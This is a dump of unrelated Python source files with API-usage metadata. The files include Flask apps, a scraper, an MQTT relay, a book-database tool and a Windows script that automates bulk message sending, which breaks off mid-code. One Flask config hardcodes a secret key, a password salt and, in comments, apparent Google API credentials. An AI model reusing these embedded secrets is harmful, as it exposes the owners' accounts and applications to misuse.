"flask.request.method", "line_number": 61, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 63, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 63, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 64, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "numpy.log", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 73, "usage_type": "call"}, {"api_name": "joblib.load", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.tables_initializer", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "281628428", "text": "import time\nfrom flask import render_template, flash, redirect, url_for, request\nfrom app import app, db\nfrom .forms import TranslatorForm\nfrom .models import Translator\nfrom unbabel_api import post_translation, get_translation\nfrom sqlalchemy.sql.expression import func\nfrom rq import Queue\nfrom worker import conn\n\ntranslation_queue = Queue(connection=conn)\n\n\ndef create_translation(text_id, text):\n \"\"\"HTTP request to the translation endpoint. Saves the uid.\n\n :param text_id: id from the new_text instance created in home()\n :param text: text to be translated\n \"\"\"\n text_to_be_translated = Translator.query.get(text_id)\n post_text = post_translation(text)\n text_to_be_translated.uid = post_text.uid\n db.session.commit()\n\n\ndef update_translation(text_id):\n \"\"\"Check the translation status. When there are changes, save status and/or translated text.\n\n :param text_id: id from the new_text instance created in home()\n \"\"\"\n text = Translator.query.get(text_id)\n time.sleep(10)\n get_text = get_translation(text.uid)\n\n if get_text.status == 'completed':\n text.text_translated = get_text.translation\n text.status = 'translated'\n db.session.commit()\n\n elif get_text.status == 'translating':\n text.status = 'pending'\n db.session.commit()\n update_translation(text_id)\n\n elif get_text.status == 'new':\n update_translation(text_id)\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef home():\n \"\"\"Main function showing translated texts and translation requests.\"\"\"\n form = TranslatorForm()\n texts = Translator.query.order_by(func.length(Translator.text_translated))\n\n if request.method == 'POST' and form.validate_on_submit():\n new_text = Translator(\n text=form.text.data,\n status='requested'\n )\n db.session.add(new_text)\n db.session.commit()\n\n #: Delay execution of create_translation\n new_request = translation_queue.enqueue_call(create_translation, args=(new_text.id, new_text.text))\n # Delay execution of update_translation. This job will be queued when the \"new_request\" is completed\n translation_queue.enqueue(update_translation, args=(new_text.id,), depends_on=new_request)\n\n flash('Your text will be translated. Please wait.', 'success')\n return redirect(url_for('home'))\n\n return render_template('home.html', form=form, texts=texts)\n", "sub_path": "main/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 2436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "rq.Queue", "line_number": 11, "usage_type": "call"}, {"api_name": "worker.conn", "line_number": 11, "usage_type": "name"}, {"api_name": "models.Translator.query.get", "line_number": 20, "usage_type": "call"}, {"api_name": "models.Translator.query", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.Translator", "line_number": 20, "usage_type": "name"}, {"api_name": "unbabel_api.post_translation", "line_number": 21, "usage_type": "call"}, {"api_name": "app.db.session.commit", "line_number": 23, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 23, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 23, "usage_type": "name"}, {"api_name": "models.Translator.query.get", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Translator.query", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.Translator", "line_number": 31, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 32, "usage_type": "call"}, {"api_name": "unbabel_api.get_translation", "line_number": 33, "usage_type": "call"}, {"api_name": "app.db.session.commit", "line_number": 38, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 38, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 38, "usage_type": "name"}, {"api_name": "app.db.session.commit", "line_number": 42, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 42, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 42, "usage_type": "name"}, {"api_name": "forms.TranslatorForm", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Translator.query.order_by", "line_number": 53, "usage_type": "call"}, {"api_name": "models.Translator.query", "line_number": 53, "usage_type": "attribute"}, {"api_name": "models.Translator", "line_number": 53, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.expression.func.length", "line_number": 53, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.expression.func", "line_number": 53, "usage_type": "name"}, {"api_name": "models.Translator.text_translated", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.request.method", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "models.Translator", "line_number": 56, "usage_type": "call"}, {"api_name": "app.db.session.add", "line_number": 60, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 60, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 60, "usage_type": "name"}, {"api_name": "app.db.session.commit", "line_number": 61, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 61, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 68, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 71, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 49, "usage_type": "call"}, {"api_name": "app.app", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "4433212", "text": "# @author by quanvo\n# @des\n\n\nimport argparse\nimport sys\nfrom lib.train import TrainingModel\nfrom lib.classfication_svc import ClassificationSVC\nfrom lib.classfication_pipe import ClassificationPiPe\n\n# add help when run cmd\nparser = argparse.ArgumentParser(description=\"Please add type run\")\nparser.add_argument('mode', type=str, help=\"Choice one mode to run [train, svc, pipe-svm, pipe-navie]\")\n\n\n\nif __name__ == '__main__':\n args = parser.parse_args(sys.argv[1:])\n print('Running with mode %s' %args.mode)\n if(args.mode == 'train'):\n TrainingModel.train()\n if(args.mode == 'svm'):\n ClassificationSVC.run('svm')\n if(args.mode == 'naive'):\n ClassificationSVC.run('naive')\n if(args.mode == 'pipe-svm'):\n pipe =ClassificationPiPe('svm')\n pipe.run()\n if(args.mode == 'pipe-navie'):\n pipe = ClassificationPiPe('navie')\n pipe.run()\n if(args.mode == 'pipe-tree'):\n pipe = ClassificationPiPe('tree')\n pipe.run()\n \n \n\n", "sub_path": "Sentence2vec/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1002, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "lib.train.TrainingModel.train", "line_number": 21, "usage_type": "call"}, {"api_name": "lib.train.TrainingModel", "line_number": 21, "usage_type": "name"}, {"api_name": "lib.classfication_svc.ClassificationSVC.run", "line_number": 23, "usage_type": "call"}, {"api_name": "lib.classfication_svc.ClassificationSVC", "line_number": 23, "usage_type": "name"}, {"api_name": "lib.classfication_svc.ClassificationSVC.run", "line_number": 25, "usage_type": "call"}, {"api_name": "lib.classfication_svc.ClassificationSVC", "line_number": 25, "usage_type": "name"}, {"api_name": "lib.classfication_pipe.ClassificationPiPe", "line_number": 27, "usage_type": "call"}, {"api_name": "lib.classfication_pipe.ClassificationPiPe", "line_number": 30, "usage_type": "call"}, {"api_name": "lib.classfication_pipe.ClassificationPiPe", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "105843174", "text": "\"\"\"\nInitialize Flask app\n\n\"\"\"\n#coding=utf-8\n\nfrom flask import Flask\nimport os\nfrom datetime import timedelta\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom werkzeug.debug import DebuggedApplication\n\nfrom flask.ext.login import LoginManager\n# from flask_googlelogin import GoogleLogin\nfrom flask_mongoengine import MongoEngine\nfrom flask_mail import Mail, Message\n\nfrom flask_apscheduler import APScheduler\n\n\napp = Flask('application')\n\nif os.getenv('FLASK_CONF') == 'TEST':\n app.config.from_object('application.settings.Testing')\n\nelif 'SERVER_SOFTWARE' in os.environ and os.environ['SERVER_SOFTWARE'].startswith('Dev'):\n # Development settings\n app.config.from_object('application.settings.Development')\n\n # Flask-DebugToolbar\n toolbar = DebugToolbarExtension(app)\n\n # Google app engine mini profiler\n # https://github.com/kamens/gae_mini_profiler\n app.wsgi_app = DebuggedApplication(app.wsgi_app, evalex=True)\n\n from gae_mini_profiler import profiler, templatetags\n\n @app.context_processor\n def inject_profiler():\n return dict(profiler_includes=templatetags.profiler_includes())\n app.wsgi_app = profiler.ProfilerWSGIMiddleware(app.wsgi_app)\nelse:\n app.config.from_object('application.settings.Production')\n\n# Enable jinja2 loop controls extension\napp.jinja_env.add_extension('jinja2.ext.loopcontrols')\n\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__)) # refers to application_top\nAPP_STATIC = os.path.join(APP_ROOT, 'static')\n\napp.config['MONGODB_SETTINGS'] = {\n 'db': 'crm_yoomee'\n # 'db': 'ici_cm',\n # 'host': 'localhost',\n # 'port': 28569\n}\n\n# This is the path to the upload directory\nCURRENT_FILE = os.path.abspath(__file__)\nCURRENT_DIR = os.path.dirname(CURRENT_FILE)\n\napp.config['FOLDER_PROJECT'] = os.path.dirname(CURRENT_DIR)\napp.config['FOLDER_APPS'] = CURRENT_DIR # Modules\napp.config['STATIC_APPS'] = CURRENT_DIR+'/static'\n\nici_link_categorie = 'ici_cm/media/pictures/categories'\nici_link = 'ici_cm/media/pictures/companies'\n\napp.config['UPLOAD_FOLDER_CATEGORIE'] = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(APP_ROOT))), ici_link_categorie)\napp.config['UPLOAD_FOLDER_CLIENT'] = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(APP_ROOT))), ici_link)\n\n# These are the extension that we are accepting to be uploaded\napp.config['ALLOWED_EXTENSIONS'] = set(['png', 'jpg', 'jpeg'])\n\napp.config['SECRET_KEY'] = '4fdb4fed4631d84f17c9711'\napp.config['SECURITY_PASSWORD_SALT'] = '4fdb4fed4631d84f17c97112e3d85442324848a29c4291a65ff53dc64bfd9a10'\n\n# app.config[\"MAIL_SERVER\"] = 'smtp.gmail.com'\n# app.config[\"MAIL_PORT\"] = 465\n# app.config[\"MAIL_USE_TLS\"] = False\n# app.config[\"MAIL_USE_SSL\"] = True\n# app.config[\"MAIL_USERNAME\"] = 'wilrona@gmail.com'\n# app.config[\"MAIL_PASSWORD\"] = ''\n\ndb = MongoEngine(app)\nmail = Mail(app)\n\nfrom application.modules.utilities.cron import Config\n\napp.config.from_object(Config())\n\nscheduler = APScheduler()\nscheduler.init_app(app)\n\n# app.permanent_session_lifetime = timedelta(seconds=1200)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'home'\n\n# app.config.update(\n# SECRET_KEY='AIzaSyBBT8JaFtFr2Gknpe5GxvhYMWdxkxULHSc',\n# GOOGLE_LOGIN_CLIENT_ID='667156749456-lbd0uctkmb0vscjn2q0e1420f20fu435.apps.googleusercontent.com',\n# GOOGLE_LOGIN_CLIENT_SECRET='TOTRxDbDVTyC-I3uZ0ATX3kJ',\n# GOOGLE_LOGIN_REDIRECT_URI='http://localhost:9090/user/oauth2callback'\n# # GOOGLE_LOGIN_REDIRECT_URI='http://fdt.accentcom.agency/user/oauth2callback'\n# )\n#\n# google_login = GoogleLogin(app)\n\n# function for jinja2\nimport function\n\napp.url_map.converters['objectid'] = function.ObjectIDConverter\napp.jinja_env.filters['format_date'] = function.format_date\napp.jinja_env.filters['format_date_month'] = function.format_date_month\napp.jinja_env.filters['add_time'] = function.add_time\napp.jinja_env.filters['format_price'] = function.format_price\napp.jinja_env.filters['get_first_day'] = function.get_first_day\napp.jinja_env.filters['get_last_day'] = function.get_last_day\napp.jinja_env.filters['string'] = function.string\n\n\n# Pull in URL dispatch routes\nimport urls\n\n\n\n\n\n\n", "sub_path": "application/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 4158, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 21, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 23, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask_debugtoolbar.DebugToolbarExtension", "line_number": 31, "usage_type": "call"}, {"api_name": "werkzeug.debug.DebuggedApplication", "line_number": 35, "usage_type": "call"}, {"api_name": "gae_mini_profiler.templatetags.profiler_includes", "line_number": 41, "usage_type": "call"}, {"api_name": "gae_mini_profiler.templatetags", "line_number": 41, "usage_type": "name"}, {"api_name": "gae_mini_profiler.profiler.ProfilerWSGIMiddleware", "line_number": 42, "usage_type": "call"}, {"api_name": "gae_mini_profiler.profiler", "line_number": 42, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 71, "usage_type": "call"}, {"api_name": "flask_mongoengine.MongoEngine", "line_number": 86, "usage_type": "call"}, {"api_name": "flask_mail.Mail", "line_number": 87, "usage_type": "call"}, {"api_name": "application.modules.utilities.cron.Config", "line_number": 91, "usage_type": "call"}, {"api_name": "flask_apscheduler.APScheduler", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.ext.login.LoginManager", "line_number": 98, "usage_type": "call"}, {"api_name": "function.ObjectIDConverter", "line_number": 115, "usage_type": "attribute"}, {"api_name": "function.format_date", "line_number": 116, "usage_type": "attribute"}, {"api_name": "function.format_date_month", "line_number": 117, "usage_type": "attribute"}, {"api_name": "function.add_time", "line_number": 118, "usage_type": "attribute"}, {"api_name": "function.format_price", "line_number": 119, "usage_type": "attribute"}, {"api_name": "function.get_first_day", "line_number": 120, "usage_type": "attribute"}, {"api_name": "function.get_last_day", "line_number": 121, "usage_type": "attribute"}, {"api_name": "function.string", "line_number": 122, "usage_type": "attribute"}]} +{"seq_id": "427584685", "text": "#!/usr/bin/env python3\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom constants import ROOT_URL\nfrom download_subject import download_subject\nfrom tqdm import tqdm\n\n\ndef download_semestr(url, dest):\n try:\n os.makedirs(dest, exist_ok=True)\n\n html_str = requests.get(url).text\n html = BeautifulSoup(html_str, 'html.parser')\n\n result_table = html.find(id='subject-table')\n if result_table is None:\n return\n for link_el in tqdm(result_table.find_all('a'), desc=url):\n link_str_relative = link_el['href']\n if not 'filearray' in link_str_relative:\n continue\n link_str_absolute = ROOT_URL + link_str_relative\n name = link_el.string\n download_subject(link_str_absolute, os.path.join(dest, name))\n except:\n print('Failed at semestr', url)\n raise\n\n\nif __name__ == '__main__':\n try:\n assert len(os.sys.argv) >= 3\n url = os.sys.argv[1]\n dest = os.sys.argv[2]\n except AssertionError:\n print('USAGE: python3 download_semestr.py URL DEST')\n exit(1)\n\n download_semestr(url, dest)\n\n", "sub_path": "download_semestr.py", "file_name": "download_semestr.py", "file_ext": "py", "file_size_in_byte": 1167, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.makedirs", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 16, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 21, "usage_type": "call"}, {"api_name": "constants.ROOT_URL", "line_number": 25, "usage_type": "name"}, {"api_name": "download_subject.download_subject", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.sys", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.sys", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.sys", "line_number": 37, "usage_type": "attribute"}]} +{"seq_id": "250473094", "text": "# import os\n# os.system(\"istats all\")\nimport subprocess\nimport serial\nimport time\n\n\n\n\n\n# XBee setting\nserdev = '/dev/tty.usbserial-AC00CNOV'\ns = serial.Serial(serdev, 9600)\n\n# s.write(\"+++\".encode())\n# char = s.read(2)\n# print(\"Enter AT mode.\")\n# print(char.decode())\n\n# s.write(\"ATMY 0x270\\r\\n\".encode())\n# char = s.read(3)\n# print(\"Set MY 0x270.\")\n# print(char.decode())\n\n# s.write(\"ATDL 0x170\\r\\n\".encode())\n# char = s.read(3)\n# print(\"Set DL 0x170.\")\n# print(char.decode())\n\n# s.write(\"ATWR\\r\\n\".encode())\n# char = s.read(3)\n# print(\"Write config.\")\n# print(char.decode())\n\n# s.write(\"ATMY\\r\\n\".encode())\n# char = s.read(4)\n# print(\"MY :\")\n# print(char.decode())\n\n# s.write(\"ATDL\\r\\n\".encode())\n# char = s.read(4)\n# print(\"DL : \")\n# print(char.decode())\n\n# s.write(\"ATCN\\r\\n\".encode())\n# char = s.read(3)\n# print(\"Exit AT mode.\")\n\n# print(char.decode())\n\nimport paho.mqtt.client as paho\nimport time\nmqttc = paho.Client()\n\n# Settings for connection\nhost = \"localhost\"\ntopic= \"Mbed\"\nport = 1883\n\n# Callbacks\ndef on_connect(self, mosq, obj, rc):\n print(\"Connected rc: \" + str(rc))\n\ndef on_message(mosq, obj, msg):\n print(\"[Received] Topic: \" + msg.topic + \", Message: \" + str(msg.payload) + \"\\n\");\n\ndef on_subscribe(mosq, obj, mid, granted_qos):\n print(\"Subscribed OK\")\n\ndef on_unsubscribe(mosq, obj, mid, granted_qos):\n print(\"Unsubscribed OK\")\n\n# Set callbacks\nmqttc.on_message = on_message\nmqttc.on_connect = on_connect\nmqttc.on_subscribe = on_subscribe\nmqttc.on_unsubscribe = on_unsubscribe\n\n# Connect and subscribe\nprint(\"Connecting to \" + host + \"/\" + topic)\nmqttc.connect(host, port=1883, keepalive=60)\nmqttc.subscribe(topic, 0)\n \n\n\nfirst = True\nwhile True:\n if first:\n line = s.read(13)\n first = False\n else:\n line = s.read(13)\n print('Get:', line.decode())\n\n mesg = line.decode()\n mqttc.publish(topic, mesg)\n print('Sent:' , mesg)\n time.sleep(1)\n # s.write(fan.encode())\n # line = s.read(20)\n # print('Get:', line.decode())\n\n # s.write(battery.encode())\n # line = s.read(21)\n # print('Get:', line.decode())\n\n # s.close()\n\n", "sub_path": "hw5_mqtt/message.py", "file_name": "message.py", "file_ext": "py", "file_size_in_byte": 2110, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "serial.Serial", "line_number": 13, "usage_type": "call"}, {"api_name": "paho.mqtt.client.Client", "line_number": 53, "usage_type": "call"}, {"api_name": "paho.mqtt.client", "line_number": 53, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "290252642", "text": "#!/usr/bin/env python\n#\n# Written by Scott Hendrickson\n#\n# 2006/01/09\n# 2019/12/15\n#\n# Tools for manipulating the book database \n###################################################\n\nimport sys\nimport json\nimport logging\nimport optparse\n\nfrom bookdbtool.tools import bookDBTool\n\nif __name__ == '__main__':\n logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n parser = optparse.OptionParser()\n parser.add_option(\"-c\", \"--config\", default=\"./configuration.json\", dest=\"config_filename\",\n help=\"Configuration file for database access.\")\n parser.add_option(\"-d\", \"--cleanup\", action=\"store_true\",dest=\"dup\",\n help=\"Remove duplicate tag entries from Tag table. Set tags to lowercase.\")\n parser.add_option(\"-f\", dest=\"tagattr\", nargs=2,\n help=\"Enter tag and field values, e.g. -f poetry Poetry. Each occurrence of\" + \\\n \" (field) in column Category will result in tagging the record with (tag).\")\n parser.add_option(\"-s\", \"--show\", action=\"store_true\", dest=\"show\",\n help=\"Show tags and fields.\", default=False)\n parser.add_option(\"-t\", \"--show_only_spell\", action=\"store_true\", dest=\"only_spell\", default=False,\n help=\"Show tags and fields.\")\n parser.add_option(\"--csv\", action=\"store_true\", dest=\"dumpcsv\", default=False,\n help=\"CSV dump from pandas\")\n parser.add_option(\"-u\", dest=\"current_update\", nargs=2,\n help=\"Enter current tag value and updated tag value, e.g. -u poetyr poetry.\")\n (options, args) = parser.parse_args()\n\n with open(options.config_filename, \"r\") as config_file:\n c = json.load(config_file)\n logging.debug(\"{}\".format(c))\n try:\n UN = c[\"username\"].strip()\n PWD = c[\"password\"].strip()\n DB = c[\"database\"].strip()\n DBHOST = c[\"host\"].strip()\n except KeyError as e:\n logging.error(e)\n sys.exit()\n\n bt = bookDBTool(DBHOST, UN, PWD, DB)\n if (options.tagattr):\n logging.info(\"Adding tag \" + options.tagattr[0] + \" to records in category \" + options.tagattr[1])\n bt.tag_from_category(options.tagattr[0], options.tagattr[1])\n if (options.current_update):\n logging.info(\"Updating tag \" + options.current_update[0] + \" to \" + options.current_update[1])\n bt.update_tag_value(options.current_update[0], options.current_update[1])\n if (options.dup):\n logging.info(\"Updating all tags to lower case...\")\n bt.lower_case_tags()\n logging.info(\"Removing duplicate and null tags...\")\n bt.deduplicate_tags()\n if (options.show or options.only_spell):\n logging.info(\"Tags:\")\n bt.show_tags(only_spell=options.only_spell)\n logging.info(\"Locations:\")\n bt.show_locations()\n if (options.dumpcsv):\n df = bt.get_dataframe()\n print(df.to_csv())\n bt.close()\n", "sub_path": "tools/bin/booktool.py", "file_name": "booktool.py", "file_ext": "py", "file_size_in_byte": 2860, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 19, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 19, "usage_type": "attribute"}, {"api_name": "optparse.OptionParser", "line_number": 20, "usage_type": "call"}, {"api_name": "json.load", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 48, "usage_type": "call"}, {"api_name": "bookdbtool.tools.bookDBTool", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 52, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 60, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 63, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "213118176", "text": "# -*- coding: utf-8 -*-\n# 请使用Python 3.4\nimport os\nimport win32api, win32con, win32gui\nimport win32con\nimport time\nimport uuid\nimport wmi\nimport base64\nimport math\nimport operator\nfrom functools import reduce\nfrom PIL import ImageGrab\nfrom PIL import Image\nimport subprocess\n\n\nINPUT_YOURS_SHIT = b'ZDA1MDk5MjE1MTU4QkZFQkZCRkYwMDAzMDZBOQ==\\n'\n# SEND_TIMES = 5\n\ndef write_file(filename, mode, content):\n \"\"\"写入文件内容\n filename为文件名\n mode为写入方式\n content为写入内容\n \"\"\"\n file_handle = open(filename, mode)\n file_handle.write(str(content))\n file_handle.close\n\n\ndef get_hwnd(class_name, title=None):\n \"\"\"获取窗口句柄\n class_name为要获取窗口的类名\n title为要获取的窗口的标题,可选项,默认为None\n 若成功返回句柄,若失败返回0\n \"\"\"\n hwnd = win32gui.FindWindow(class_name, title)\n return hwnd\n\n\ndef get_wnd_text(hwnd):\n \"\"\"获取窗口标题\n hwnd为窗口的句柄\n 若成功返回标题,失败返回None\n \"\"\"\n text = win32gui.GetWindowText(hwnd)\n return text\n\n\ndef change_wnd_text(hwnd, text):\n \"\"\"设置窗口的标题\n hwnd为所要设置的窗口句柄\n text为所要设置成的窗口标题,\n 成功返回text, 失败返回None\n 注意,若为中文直接输入即可,不要在前面加u\n \"\"\"\n win32gui.SetWindowText(hwnd, text)\n _text = get_wnd_text(hwnd)\n if _text == text:\n return _text\n else:\n return None\n\n\ndef get_all_handles(filename, class_name, title=None):\n \"\"\"保存所要指定窗口的句柄到文件中\n filename为文件名\n class_name为要获取窗口的类名\n title为要获取的窗口的标题,可选项,默认为None\n \"\"\"\n hwnds_array = []\n new_title = \"saved\"\n while get_hwnd(class_name, title) != 0:\n hwnd = get_hwnd(class_name, title)\n hwnds_array.append(hwnd)\n change_wnd_text(hwnd, new_title)\n write_file(filename, 'w', hwnds_array)\n for hwnd in hwnds_array:\n change_wnd_text(hwnd, title)\n return hwnds_array\n\n\ndef hide_window(hwnd):\n \"\"\"传入句柄,将窗口最小化\n hwnd为所要设置的窗口句柄\n \"\"\"\n win32gui.ShowWindow(hwnd, win32con.SW_SHOWMINIMIZED)\n\n\ndef show_window(hwnd):\n \"\"\"传入句柄,将窗口复原显示\n hwnd为所要设置的窗口句柄\n \"\"\"\n win32gui.ShowWindow(hwnd, win32con.SW_SHOWNORMAL)\n\n\ndef set_active_window(hwnd):\n \"\"\"激活窗口\n \"\"\"\n win32gui.SetActiveWindow(hwnd)\n\n\ndef get_origin_point():\n \"\"\"设置窗口初始值\n \"\"\"\n zero_point = 50\n pos = [zero_point, zero_point, 500, 500]\n return pos\n\n\ndef dif_to_real(dif_x, dif_y):\n \"\"\"将相对位置转化为绝对位置\n \"\"\"\n origin = get_origin_point()\n origin_x = origin[0]\n origin_y = origin[1]\n real_x = origin_x + dif_x\n real_y = origin_y + dif_y\n return [real_x, real_y]\n\n\ndef move_window(hwnd, pos):\n \"\"\"传入句柄,将窗口移动到指定位置\n hwnd为所要设置的窗口句柄\n pos为要移动的位置\n \"\"\"\n win32gui.MoveWindow(hwnd, pos[0], pos[1], pos[2], pos[3], True)\n\n\ndef delay(delay_time):\n \"\"\"延时函数,单位ms\n \"\"\"\n time.sleep(delay_time/1000)\n\n\ndef init_to_start(hwnds_array, pos):\n \"\"\"传入句柄数组,移动到指定位置,为之后的操作做初始化\n hwnds_array为要初始化的句柄数组\n \"\"\"\n for hwnd in hwnds_array:\n print(\"start:\", hwnd)\n show_window(hwnd)\n move_window(hwnd, pos)\n return len(hwnds_array)\n\ndef left_click(pos_x, pos_y):\n win32api.SetCursorPos([pos_x, pos_y])\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0,0,0)\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0,0,0)\n\n\ndef click_contacts():\n [contacts_x, contacts_y] = dif_to_real(20, 116)\n left_click(contacts_x, contacts_y)\n\n\n\n\ndef click_send_icon():\n X = 600\n for y in range(400, 580, 10):\n left_click(X, y)\n\n\ndef paste_message():\n \"\"\"paste the strting\n \"\"\"\n win32api.keybd_event(17, 0, 0, 0)\n win32api.keybd_event(86, 0, 0, 0)\n win32api.keybd_event(86, 0, win32con.KEYEVENTF_KEYUP, 0)\n win32api.keybd_event(17, 0, win32con.KEYEVENTF_KEYUP, 0)\n\ndef send_message():\n \"\"\"粘贴后发送\n \"\"\"\n win32api.keybd_event(18, 0, 0, 0)\n win32api.keybd_event(83, 0, 0, 0)\n win32api.keybd_event(83, 0, win32con.KEYEVENTF_KEYUP, 0)\n win32api.keybd_event(18, 0, win32con.KEYEVENTF_KEYUP, 0)\n\n\ndef keybd_down():\n win32api.keybd_event(40, 0, 0, 0)\n win32api.keybd_event(40, 0, win32con.KEYEVENTF_KEYUP, 0)\n\n\ndef get_mac_address():\n node = uuid.getnode()\n mac = uuid.UUID(int = node).hex[-12:]\n return mac\n\n\ndef get_cpu_info():\n c = wmi.WMI()\n for cpu in c.Win32_Processor():\n cpu_id = cpu.ProcessorId.strip()\n return cpu_id\n\n\ndef ency():\n mac = get_mac_address().encode(\"utf-8\")\n cpu_id = get_cpu_info().encode(\"utf-8\")\n mac_2 = base64.b64encode(mac)\n cpu_id_2 = base64.encodestring(cpu_id)\n ency_string = 